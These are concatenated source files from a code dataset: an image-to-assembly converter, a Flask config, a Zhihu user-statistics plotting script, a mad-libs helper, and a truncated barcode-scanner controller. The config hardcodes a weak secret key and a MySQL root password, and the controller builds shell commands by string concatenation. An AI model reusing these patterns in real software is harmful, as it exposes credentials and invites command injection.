ixsz // txsz\n ty = iysz // tysz\n mask = (1 << bits) - 1\n\n fd.write(\"{}\\n\".format(label))\n cnt = 0\n col = 0\n\n for tr in range(ty):\n rbase = tr * tysz\n\n for tc in range(tx):\n cbase = tc * txsz\n if col != 0:\n fd.write(\"\\n\")\n col = 0\n fd.write(\";; {} {:02x}\\n\".format(label, cnt))\n cnt += 1\n for r in range(tysz):\n for c in range(0, txsz, 8 // bits):\n v = 0\n for b in range(8 // bits):\n v = (v << bits) | img.getpixel((c + cbase + b, r + rbase)) & mask\n if col == 0:\n fd.write(\"\\tdefb {:02x}\".format(v))\n elif col != 15:\n fd.write(\", {:02x}\".format(v))\n else:\n fd.write(\", {:02x}\\n\".format(v))\n col = (col + 1) % 16\n\n if col != 0:\n fd.write(\"\\n\")\n fd.write(\"{}_end:\\n\".format(label))\n\n\nverbose = 0\noffset = OFFSET\nskip = SKIP\nsize = SIZE\nbits = BITS\nouttype = ASM\nlabel = LABEL\ninname = None\noutname = None\npalname = None\npalfile = None\n\nopts = \"ab:ghi:l:o:O:p:rsS:tvVz:\"\nlongopts = ['asm', 'bits=', 'pgm', 'help', 'in=', 'label=', 'out=', 'offset=',\n 'pal=', 'raw', 'sprite', 'skip=', 'tile' 'version' 'verbose', 'size=']\n\ntry:\n optlist, arglist = getopt.getopt(sys.argv[1:], opts, longopts)\nexcept getopt.GetoptError as err:\n sys.stderr.write(\"{}\\n\".format(err))\n exit(1)\n\nfor opt, arg in optlist:\n if opt in ('-b', '--bits'):\n bits = int(arg)\n if bits != 1 and bits != 2 and bits != 4 and bits != 8:\n sys.stderr.write(\"Unsupported bit depth: {}\\n\".format(bits))\n exit(1)\n\n elif opt in ('-g', '--pgm'):\n outtype = PGM\n\n elif opt in ('-h', '--help'):\n my_help(sys.argv[0])\n exit(0)\n\n elif opt in ('-i', '--in'):\n inname = arg\n\n elif opt in ('-l', '--label'):\n label = arg\n\n elif opt in ('-O', '--offset'):\n offset = int(arg)\n\n elif opt in ('-o', '--out'):\n outname = arg\n\n elif opt in ('-p', '--pal'):\n palname = arg\n\n elif opt in ('-r', '--raw'):\n outtype = RAW\n\n elif opt in ('-s', '--sprite'):\n bits = 8\n size = 16\n\n elif opt in ('-S', '--skip'):\n skip = int(arg)\n\n elif opt in ('-t', '--tile'):\n bits = 4\n size = 8\n\n elif opt in ('-V', '--version'):\n version()\n exit(0)\n\n elif opt in 
('-v', '--verbose'):\n verbose += 1\n\n elif opt in ('-z', '--size'):\n size = int(arg)\n\n else:\n sys.stderr.write(\"Illegal option {}\\n\", opt)\n exit(1)\n\nif palname is not None:\n try:\n palfile = open(palname, 'rb')\n except OSError:\n sys.stderr.write(\"Unable to open {}\\n\".format(inname))\n exit(1)\n\nif len(arglist) > 0 and inname is None:\n inname = arglist.pop(0)\n\nif len(arglist) > 0 and outname is None:\n outname = arglist.pop(0)\n\nif inname is None:\n sys.stderr.write(\"No input file\\n\")\n\nif outname is None:\n sys.stderr.write(\"No output file\\n\")\n\ntry:\n infile = open(inname, 'rb')\nexcept OSError:\n sys.stderr.write(\"Unable to open {}\\n\".format(inname))\n exit(1)\n\ntry:\n if outtype == RAW or outtype == PGM:\n outfile = open(outname, 'wb')\n else:\n outfile = open(outname, 'w')\nexcept OSError:\n sys.stderr.write(\"Unable to open {}\\n\".format(outname))\n exit(1)\n\nzxn.setverbose(verbose)\nimage = Image.open(infile)\nimage.convert('RGB')\n# rgb = image.data()\n\nif palfile is not None:\n pal = zxn.readpal(palfile)\nelse:\n pal = zxn.makepal(zxn.palette(bits))\n\ndec = decimate(image, offset, offset, skip, skip)\ndec = dec.quantize(colors=(1 << bits), palette=pal, dither=Image.NONE)\n\nxsz, ysz = dec.size\nif xsz % size != 0 or ysz % size != 0:\n sys.stderr.write(\"Not perfectly tilable\\n\")\n exit(-1)\n\nif outtype == RAW:\n writeraw(outfile, dec, bits, size, size)\nelif outtype == ASM:\n writeasm(outfile, dec, bits, label, size, size)\nelif outtype == PGM:\n writepgm(outfile, dec, bits, size, size)\nelse:\n sys.stderr.write(\"Output type error\\n\")\n\ninfile.close()\noutfile.close()\n","repo_name":"varmfskii/zxnimage","sub_path":"python/imagetoasm.py","file_name":"imagetoasm.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42314414828","text":"# form stuff\nCSRF_ENABLED = True\nSECRET_KEY = 'you-will-never-guess'\n\n# database stuff\nimport os\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'mysql://root:pawler@localhost/pawlerdb?unix_socket=/var/run/mysqld/mysqld.sock'\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n","repo_name":"aaustin/pawler","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33162825013","text":"# !/usr/bin/python\r\n# coding=utf-8\r\n'''\r\n['\\ufeff_id', 'url_token', 'allow_message', 'answer_count', 'articles_count',\r\n 'avatar_url', 'avatar_url_template', 'badge', 'business', 'columns_count',\r\n 'educations', 'companies', 'favorite_count', 'favorited_count', 'follower_count',\r\n 'following_columns_count', 'following_count', 'following_favlists_count', 'following_question_count', 'following_topic_count',\r\n 'gender', 'headline', 'hosted_live_count', 'id', 'is_advertiser',\r\n 'is_blocking', 'is_followed', 'is_following', 'is_org', 'locations',\r\n 'name', 'participated_live_count', 'pins_count', 'question_count', 'thank_from_count',\r\n 'thank_to_count', 'thanked_count', 'type', 'url', 'user_type',\r\n 'vote_from_count', 'vote_to_count', 'voteup_count']\r\n'''\r\nimport csv\r\nfrom matplotlib import pyplot as plt\r\nimport json\r\nfrom collections import Counter\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud\r\nfrom wordcloud import WordCloud,STOPWORDS,ImageColorGenerator\r\nfrom scipy.misc import 
imread\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport jieba\r\n\r\n#指定默认字体\r\nplt.rcParams['font.sans-serif'] = ['SimHei']\r\nplt.rcParams['font.family']='sans-serif'\r\n#解决负号'-'显示为方块的问题\r\nplt.rcParams['axes.unicode_minus'] = False\r\n\r\n\r\n# 定义列表存储数据\r\ngender = []\r\nlocations = []\r\nname = []\r\nfollower_count = []\r\nfollowing_count = []\r\nvoteup_count = []\r\nthanked_count = []\r\nanswer_count = []\r\nquestion_count = []\r\narticles_count = []\r\neducations = []\r\ncompanies = []\r\njobs = []\r\nbusiness = []\r\n\r\nfile = open('..\\data.json', 'r', encoding='utf-8')\r\nfor line in file.readlines():\r\n dic = json.loads(line)\r\n # 地理位置\r\n if len(dic['locations']):\r\n locations.append(dic['locations'][0]['name'])\r\n # 性别\r\n gender.append(dic['gender'])\r\n # 知乎名字\r\n name.append(dic['name'])\r\n # 粉丝数\r\n follower_count.append(dic['follower_count'])\r\n # 关注他人数\r\n following_count.append(dic['following_count'])\r\n # 获得赞同数\r\n voteup_count.append(dic['voteup_count'])\r\n # 获得感谢数\r\n thanked_count.append(dic['thanked_count'])\r\n # 回答问题数\r\n answer_count.append(dic['answer_count'])\r\n # 提出问题数\r\n question_count.append(dic['question_count'])\r\n # 写文章数\r\n articles_count.append(dic['articles_count'])\r\n # 教育情况\r\n try:\r\n edu_place = dic['educations'][0]['school']['name']\r\n except:\r\n continue\r\n educations.append(edu_place)\r\n # 公司情况\r\n try:\r\n company_name = dic['employments'][0]['company']['name']\r\n except:\r\n continue\r\n companies.append(company_name)\r\n # 职业情况\r\n try:\r\n job_name = dic['employments'][0]['job']['name']\r\n except:\r\n continue\r\n jobs.append(job_name)\r\n # 行业情况\r\n try:\r\n business_name = dic['business']['name']\r\n except:\r\n continue\r\n business.append(business_name)\r\n\r\n# 男女比例作图\r\ncount_male = 0\r\ncount_female = 0\r\ncount_sex_unknow = 0\r\nfor i in gender:\r\n if i == 1:\r\n count_male+=1\r\n elif i == 0:\r\n count_female+=1\r\n else:\r\n count_sex_unknow+=1\r\nplt.figure(figsize=(6,9))\r\nlabels = [u'男性', u'女性', u'性别不详']\r\nsizes = [count_male, count_female ,count_sex_unknow]\r\ncolors = ['red','yellowgreen','lightskyblue']\r\nexplode = (0.05,0,0)\r\npatches,l_text,p_text = plt.pie(sizes,explode=explode,labels=labels,colors=colors,\r\n labeldistance = 1.1,autopct = '%3.1f%%',shadow = False,\r\n startangle = 90,pctdistance = 0.6)\r\nfor t in l_text:\r\n t.set_size=(30)\r\nfor t in p_text:\r\n t.set_size=(20)\r\nplt.title('男女比例分布—Top15')\r\nplt.axis('equal')\r\nplt.legend()\r\nplt.savefig(\"sexual.jpg\")\r\nplt.show()\r\nwith open(\"sexual.txt\", \"w\") as f:\r\n for j in range(3):\r\n f.write(str(labels[j]) + ' ' + str(sizes[j]) + '\\n')\r\n\r\n\r\n# 地理位置分布 作图\r\nlocations_name = []\r\nlocations_count = []\r\nfor i in range(30):\r\n locations_name.append(Counter(locations).most_common(30)[i][0].strip('市'))\r\n locations_count.append(Counter(locations).most_common(30)[i][1])\r\ndata = locations_count\r\nlabels = locations_name\r\nplt.xticks(rotation=90)\r\nplt.title('地理位置分布—Top30')\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"locations.jpg\")\r\nplt.show()\r\nwith open(\"locations.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 关注数最多\r\ndict_name_follower_count = dict(zip(name,follower_count))\r\ndict_name_follower_count = dict(sorted(dict_name_follower_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in dict_name_follower_count.items():\r\n 
m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('关注数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"follower_count.jpg\")\r\nplt.show()\r\nwith open(\"follower_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 关注他人数最多\r\ndict_name_following_count = dict(zip(name,following_count))\r\ndict_name_following_count = dict(sorted(dict_name_following_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in dict_name_following_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('关注他人数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"following_count.jpg\")\r\nplt.show()\r\nwith open(\"following_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 获得赞同数\r\nvoteup_count_count = dict(zip(name,voteup_count))\r\nvoteup_count_count = dict(sorted(voteup_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in voteup_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('获得赞同数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"voteup_count.jpg\")\r\nplt.show()\r\nwith open(\"voteup_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 获得感谢数\r\nthanked_count_count = dict(zip(name,thanked_count))\r\nthanked_count_count = dict(sorted(thanked_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in thanked_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('获得感谢数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"thanked_count.jpg\")\r\nplt.show()\r\nwith open(\"thanked_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 回答问题数\r\nanswer_count_count = dict(zip(name,answer_count))\r\nanswer_count_count = dict(sorted(answer_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in answer_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('回答问题数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"answer_count.jpg\")\r\nplt.show()\r\nwith open(\"answer_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 提出问题数\r\nquestion_count_count = dict(zip(name,question_count))\r\nquestion_count_count = dict(sorted(question_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in question_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if 
cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('提出问题数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"question_count.jpg\")\r\nplt.show()\r\nwith open(\"question_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 写文章数\r\narticles_count_count = dict(zip(name,articles_count))\r\narticles_count_count = dict(sorted(articles_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in articles_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('写文章数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"articles_count.jpg\")\r\nplt.show()\r\nwith open(\"articles_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 教育情况\r\nremove_edu_worrds = ['本科', '硕士', '大学', '高中', '初中', '小学', '博士', '研究生']\r\nfor i in educations:\r\n if i in remove_edu_worrds:\r\n educations.remove(i)\r\neducations_count = []\r\neducations_name = []\r\nfor i in range(30):\r\n educations_name.append(Counter(educations).most_common(30)[i][0])\r\n educations_count.append(Counter(educations).most_common(30)[i][1])\r\ndata = educations_count\r\nlabels = educations_name\r\nplt.title('人数最多学校—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"educations_count.jpg\")\r\nplt.show()\r\nwith open(\"educations_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 公司情况\r\nremove_company_worrds = ['无', '无业游民', '医院', '互联网', '微信', '微信公众号', '浙江大学', '自由职业', '私募', '搬砖']\r\nfor i in companies:\r\n if i in remove_company_worrds:\r\n companies.remove(i)\r\ncompanies_count = []\r\ncompanies_name = []\r\nfor i in range(30):\r\n companies_name.append(Counter(companies).most_common(30)[i][0])\r\n companies_count.append(Counter(companies).most_common(30)[i][1])\r\ndata = companies_count\r\nlabels = companies_name\r\nplt.title('人数最多公司—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"companies_count.jpg\")\r\nplt.show()\r\nwith open(\"companies_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 职业情况\r\nremove_jobs_worrds = []\r\nfor i in jobs:\r\n if i in remove_jobs_worrds:\r\n jobs.remove(i)\r\njobs_count = []\r\njobs_name = []\r\nfor i in range(30):\r\n jobs_name.append(Counter(jobs).most_common(30)[i][0])\r\n jobs_count.append(Counter(jobs).most_common(30)[i][1])\r\ndata = jobs_count\r\nlabels = jobs_name\r\nplt.title('人数最多职业—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"jobs_count.jpg\")\r\nplt.show()\r\nwith open(\"jobs_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 行业情况\r\nremove_business_worrds = []\r\nfor i in business:\r\n if i in remove_business_worrds:\r\n business.remove(i)\r\nbusiness_count = []\r\nbusiness_name = []\r\nfor i in range(30):\r\n business_name.append(Counter(business).most_common(30)[i][0])\r\n 
business_count.append(Counter(business).most_common(30)[i][1])\r\ndata = business_count\r\nlabels = business_name\r\nplt.title('人数最多行业—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"business_count.jpg\")\r\nplt.show()\r\nwith open(\"business_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n\r\n\r\n\"\"\"\r\n词云的实现方式\r\n\"\"\"\r\n\r\n# # 教育情况\r\n# remove_edu_worrds = ['本科', '硕士', '大学', '高中', '初中', '小学', '博士', '研究生']\r\n# for i in educations:\r\n# if i in remove_edu_worrds:\r\n# educations.remove(i)\r\n# educations_count = []\r\n# for i in range(30):\r\n# educations_count.append(Counter(educations).most_common(30)[i])\r\n# plt.title('教育情况—Top30')\r\n# wl_space_split = \" \".join(str(i) for i in educations_count)\r\n# font_path = r':\\Workspace\\22.small\\05.zhihu-user-1000-4.22\\simfang.ttf'\r\n# back_coloring = imread('bg.png')# 设置背景图片\r\n# wc = WordCloud(font_path=font_path, # 设置字体\r\n# background_color=\"white\", # 背景颜色\r\n# max_words=2000, # 词云显示的最大词数\r\n# mask=back_coloring, # 设置背景图片\r\n# max_font_size=100, # 字体最大值\r\n# random_state=42,\r\n# margin=1,\r\n# )\r\n# wc.generate(wl_space_split)\r\n# image_colors = ImageColorGenerator(back_coloring)\r\n# plt.imshow(wc.recolor(color_func=image_colors))\r\n# plt.axis(\"off\")\r\n# # 绘制背景图片为颜色的图片\r\n# plt.figure()\r\n# # plt.imshow(back_coloring, cmap=plt.cm.gray)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# wc.to_file('educations.png')\r\n#\r\n# # 公司情况\r\n# remove_company_worrds = ['无', '无业游民', '医院', '互联网', '微信', '微信公众号', '浙江大学', '自由职业', '私募', '搬砖']\r\n# for i in companies:\r\n# if i in remove_company_worrds:\r\n# companies.remove(i)\r\n# companies_count = []\r\n# for i in range(30):\r\n# companies_count.append(Counter(companies).most_common(30)[i])\r\n# plt.title('人数最多公司—Top30')\r\n# wl_space_split = \" \".join(str(i) for i in companies_count)\r\n# font_path = r':\\Workspace\\22.small\\05.zhihu-user-1000-4.22\\simfang.ttf'\r\n# back_coloring = imread('bg.png')# 设置背景图片\r\n# wc = WordCloud(font_path=font_path, # 设置字体\r\n# background_color=\"white\", # 背景颜色\r\n# max_words=2000, # 词云显示的最大词数\r\n# mask=back_coloring, # 设置背景图片\r\n# max_font_size=100, # 字体最大值\r\n# random_state=42,\r\n# margin=1,\r\n# )\r\n# wc.generate(wl_space_split)\r\n# image_colors = ImageColorGenerator(back_coloring)\r\n# plt.imshow(wc.recolor(color_func=image_colors))\r\n# plt.axis(\"off\")\r\n# # 绘制背景图片为颜色的图片\r\n# plt.figure()\r\n# # plt.imshow(back_coloring, cmap=plt.cm.gray)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# wc.to_file('companies.png')","repo_name":"sugurs/ZhihuUserSpiderAndAnalysis","sub_path":"analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37366617199","text":"def replace_blank(story, char_start_pos, char_end_pos):\n word = story[char_start_pos:char_end_pos]\n return story[:char_start_pos-1] + '[ {} ]'.format(word) + story[char_end_pos:]\n\n\ndef get_num_blanks(story):\n count = 0\n blank = '_'\n for pos, char in enumerate(story):\n if(char == blank):\n count += 1\n return count\n\n\ndef get_blank_pos(story):\n blank = '_'\n for pos, char in enumerate(story):\n if (char == blank):\n return pos\n\n\ndef randomStory(storyFile, wordTypes):\n with open(storyFile) as file:\n story = file.read()\n\n num_blanks = get_num_blanks(story)\n for num in range(num_blanks):\n 
blank_pos = get_blank_pos(story)\n\n char_start_pos = blank_pos + 1\n char_end_pos = char_start_pos\n\n while(story[char_end_pos].isalnum()):\n char_end_pos += 1\n\n story = replace_blank(story, char_start_pos, char_end_pos)\n\n return story\n\n\nif __name__ == \"__main__\":\n print(randomStory('story.txt', []), end='')\n pass","repo_name":"akarshijain/duke-summer-computing-institute-2022","sub_path":"module1/mad_libs_game/21_rand_story_1.py","file_name":"21_rand_story_1.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32709199614","text":"# -*- coding: utf-8 -*-\n\"\"\"\ncontroller.py\n\"\"\"\nimport sys\nimport time\nimport json\nimport pygame\nimport requests\nimport serial\nimport os\nimport stat\nimport socket\nimport smtplib\nimport logging\n\nfrom email.mime.text import MIMEText\nfrom blinkstick import blinkstick\nfrom requests.exceptions import ConnectionError\nfrom serial.serialutil import SerialException\nfrom logging.handlers import RotatingFileHandler\nfrom datetime import datetime\nfrom systemParameters import ThisSystem\nfrom usb.core import find as finddev\nfrom usb import util\n\nprint (\"serial.__version__\" + serial.VERSION)\n\n# Flags and counters\nsp = None\npreviousPingServerMessage = None\nscannerFailedCounter = 0\nskipBlinkStick = False\nstartupCompleted = False\n\n# Set up logging\nlogger = logging.getLogger(\"Controller Rotating Log\")\nlogger.setLevel(logging.DEBUG)\nhandler1 = RotatingFileHandler(ThisSystem.log_filename, maxBytes=100000, backupCount=5)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler1.setFormatter(formatter)\nhandler2 = logging.StreamHandler(sys.stdout)\nlogger.addHandler(handler1)\nlogger.addHandler(handler2)\n\n# Preload sound files\npygame.mixer.pre_init(44100, -16, 2, 2048)\npygame.mixer.init()\npygame.init()\nping = pygame.mixer.Sound(ThisSystem.successSound)\nbuzz = pygame.mixer.Sound(ThisSystem.failSound)\n\n# Blink one at a time until all are blue\n# Must have a mimimum delay of 0.02 seconds when changing colors\ndef startup(delay=0.15):\n global startupCompleted\n\n ping.play()\n bs = blinkstick.find_first()\n \n if bs is None:\n startupCompleted = True\n #raise BlinkStickNotConnected\n return False\n \n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"blue\")\n time.sleep(delay)\n\n startupCompleted = True\n \n# Blink change one at a time to green and then back to blue\ndef success(delay=0.1, hold=0.1):\n ping.play()\n \n if skipBlinkStick == True:\n if isBlinkStickAttached()==True:\n if resetBlinkStick() !=True:\n return\n else:\n logger.info(\"BlinkStick has been re-attached.\")\n else:\n return\n \n bs = blinkstick.find_first()\n if bs is None:\n return False\n\n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"green\")\n time.sleep(delay)\n time.sleep(hold)\n\n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"blue\")\n time.sleep(delay)\n\n# Turn all red and stay red\ndef fail(delay=0.1):\n\n buzz.play()\n \n if skipBlinkStick:\n if isBlinkStickAttached():\n if resetBlinkStick() is False:\n return\n else:\n return\n \n bs = blinkstick.find_first()\n \n if bs is None:\n return False\n \n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"red\")\n time.sleep(delay)\n \n# Turn off all LEDs\ndef off():\n if skipBlinkStick:\n if isBlinkStickAttached():\n if resetBlinkStick() is False:\n return\n else:\n return\n \n bs = 
blinkstick.find_first()\n \n if bs is None:\n return False\n \n for i in range(8):\n bs.set_color(channel=0, index=i, name=None)\n\n# Blink Only first LED\ndef pingSuccess(hold=0.50):\n global skipBlinkStick\n\n if skipBlinkStick:\n if isBlinkStickAttached():\n if resetBlinkStick() is False:\n return\n else:\n return\n skipBlinkStick = False\n bs = blinkstick.find_first()\n \n if bs is None:\n return False\n \n bs.set_color(channel=0, index=0, name=None)\n time.sleep(hold)\n bs.set_color(channel=0, index=0, name=\"blue\")\n time.sleep(hold)\n \n# Log a barcode\ndef log(barcode, instrument):\n\n starttime= datetime.utcnow()\n data = {'BARCODE':barcode, 'INSTRUMENT_NAME':ThisSystem.instrumentID,'START_TIME':starttime}\n resp = requests.post(ThisSystem.log_url, data=data)\n rdata = json.loads( resp.text )\n \n if rdata['ID']:\n success()\n return rdata['ID']\n else:\n fail()\n\n# Check to see if server is up and running\ndef pingServer(serverToPing):\n global previousPingServerMessage\n \n # redirect the response of error and messages to a file \n response = os.system(\"ping -c 1 \" + serverToPing + \"> nodisplay.txt 2>&1\")\n time.sleep (0.1)\n if response == 0:\n \n response = \"Server \" + serverToPing + \" is active.\"\n \n if previousPingServerMessage == response:\n return True\n previousPingServerMessage = response\n \n return True\n else:\n \n response = \"Server \" + serverToPing + \" is DOWN.\"\n \n if previousPingServerMessage is None:\n print (\"response : \" + response)\n previousPingServerMessage = response\n\n return False\n\n# Read the bar code via the serial port\ndef readBarcode():\n global sp\n global ThisSystem\n global scannerFailedCounter\n \n numTries = 5 # was 20 * 10 second for warmup or 2 minutes\n if scannerFailedCounter > 0:\n logger.info(\"Cannot find serial port \" + ThisSystem.serialPort + \" try # : \" + str(scannerFailedCounter))\n if scannerFailedCounter >= numTries:\n errMessage = \"Rebooting system to resetting serial port to \" + ThisSystem.serialPort + \" after \" + str(numTries) + \" tries.\"\n logger.info(errMessage)\n sendEmail(errMessage)\n os.system('sudo shutdown -r now')\n if scannerFailedCounter > 0:\n logger.info(\"Cannot find serial port \" + ThisSystem.serialPort + \" try # : \" + str(scannerFailedCounter))\n if not device_exists(ThisSystem.serialPort):\n return None\n\n # Clear the buffer\n if sp == None:\n sp = serial.Serial(\n port = ThisSystem.serialPort,\n baudrate = ThisSystem.serialBaudrate,\n parity = ThisSystem.serialParity,\n stopbits = ThisSystem.serialStopbits,\n timeout = ThisSystem.serialTimeout,\n xonxoff = ThisSystem.serialXonxoff,\n rtscts = ThisSystem.serialRtscts,\n dsrdtr = ThisSystem.serialDsrdtr\n )\n \n barcode = sp.readline()\n\n # Convert from btye to string data and remove the carriage return that was generated by the bar code reader\n barcode = str(barcode,'utf-8').rstrip('\\r')\n scannerFailedCounter = 0\n return barcode\n\n# Send an email with an error message\ndef sendEmail(errmsg):\n global lastError, previousError\n \n try:\n if ThisSystem.sendEmail == True:\n ## **************************************************************************\n ## for sending emails when no authentication is required\n ## \n computerName = socket.gethostname()\n msg = MIMEText(errmsg)\n sendFrom = ThisSystem.instrumentID\n msg['Subject'] = \"Error message from \" + sendFrom + \". 
computer : \" + computerName\n msg['From'] = ThisSystem.instrumentID\n msg['To'] = ThisSystem.emailUsers\n toRecipients = ThisSystem.emailUsers.split(',') \n print (\"Sending email to : \" + ThisSystem.emailUsers)\n print (\"Message sent : \" + errmsg)\n server = smtplib.SMTP(ThisSystem.emailServer, 25)\n server.starttls()\n server.sendmail(sendFrom, toRecipients, str(msg))\n server.quit()\n \n ## **************************************************************************\n ## for sending emails requing authentication\n ##\n ##computerName = socket.gethostname()\n ##msg = MIMEText(errmsg)\n ##sendFrom = ThisSystem.instrumentID\n ##msg['Subject'] = \"Error message from \" + sendFrom + \". computer : \" + computerName\n ##msg['From'] = ThisSystem.instrumentID\n ##msg['To'] = ThisSystem.emailUsers\n ##toRecipients = ThisSystem.emailUsers.split(',') \n #print (\"Sending the following email msg to : \" + + ThisSystem.emailUsers)\n #print (\"Message sent : \" + errmsg)\n ##server = smtplib.SMTP('smtp.gmail.com', 587)\n ##server.login(\"williamneil777@gmail.com\", \"putpasswordinhere\")\n ##server.sendmail(\"FromUser@gmail.com\", \"WilliamNeil777@gmail.com\", str(msg))\n ##server.quit()\n ## **************************************************************************\n else:\n print (\"skipping email\")\n return\n except Exception as e:\n return\n\n# Determine if the device name exists \ndef device_exists(path):\n global scannerFailedCounter\n try:\n if stat.S_ISBLK(os.stat(path).st_mode) == False:\n sp = None\n return True\n \n else: \n sp = None\n scannerFailedCounter = scannerFailedCounter + 1\n return False\n \n except Exception as e:\n scannerFailedCounter = scannerFailedCounter + 1\n time.sleep(10)\n return False\n\n# Determine the vendor id and product Id by running the lsusb command in terminal\ndef isBlinkStickAttached():\n try:\n dev = finddev(idVendor = ThisSystem.idVendor, idProduct = ThisSystem.idProduct)\n if dev is not None:\n #manufacturer = util.get_string(dev,256,1)\n #deviceDescription = util.get_string(dev,256,2)\n #deviceSerialNumber = util.get_string(dev,256,3)\n #print (\"Manufacturer : \" + manufacturer)\n #print (\"Device Description : \" + 